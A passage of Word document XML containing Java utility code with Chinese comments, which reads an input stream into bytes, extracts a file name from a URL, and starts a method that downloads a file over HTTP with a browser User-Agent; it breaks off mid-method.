          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>return ;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED435D4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E21C9FA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="114E4BFF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve"> //</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从输入流中获取字节数组</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C636C1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    public static  byte[] readInputStream(InputStream inputStream) throws IOException {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="662F37AB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        byte[] b = new byte[1024];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7785BF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        int len = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5052B612" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        ByteArrayOutputStream bos = new ByteArrayOutputStream();//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>创建字节流缓冲区存取字节</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101FA789" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        while((len = inputStream.read(b)) != -1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296AE1D4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">            bos.write(b, 0, len);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04663831" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60866FCA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        bos.close();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207B76DF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        return bos.toByteArray();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B8BFE5C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A9F5DA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    //</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取文件的类型和名字</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07496B4A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    public static String getFileName(String url) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A5A71D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>int sta1=url.lastIndexOf(".");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C08C3F9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>char[] tchar=new char[1024];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37530964" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>url.getChars(sta1, url.length(), tchar, 0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079C0451" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="075E59BE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>int sta2=url.lastIndexOf("/");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A577FC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>char[] tchar1=new char[1024];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF8CD98" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>url.getChars(sta2+1, sta1, tchar1, 0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F43243" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>String s=new String();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D38F980" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>for(char i:tchar1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC87013" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>if(i=='\0') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D807B2C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>break;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1501FA9D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F81249" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>s+=i;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E2254E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48BDF04F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>for(char i:tchar) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B8F1C6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>if(i=='\0') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07200210" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>break;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FBDE13" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66837CEE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>s+=i;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D5CA461" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="461B08FC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>return s;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16348D08" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79132B71" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下载文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F768F73" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>public static void downLoadFormURL(String url,String filePath) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326A234B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD8B91B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>URL u=new URL(url);//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114217E1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>HttpURLConnection conn=(HttpURLConnection) u.openConnection();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9AC8C3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>conn.setConnectTimeout(3000);//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置连接超时时间</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6014B941" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>屏蔽</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>403</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>错误</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1613D958" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>conn.setRequestProperty("User-Agent", "Mozilla/4.0 (compatible; MSIE 5.0; Windows NT; DigExt)");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1285B992" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>InputStream in=conn.getInputStream();//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取输入流</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F2CDD26" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>byte[] data=readInputStream(in);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="672CBCBD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>File file=new File(filePath);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5198DE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>if(!file.isDirectory()) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6762604D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>System.out.println("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>存放路径不对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44155A24" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="022FEDB3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
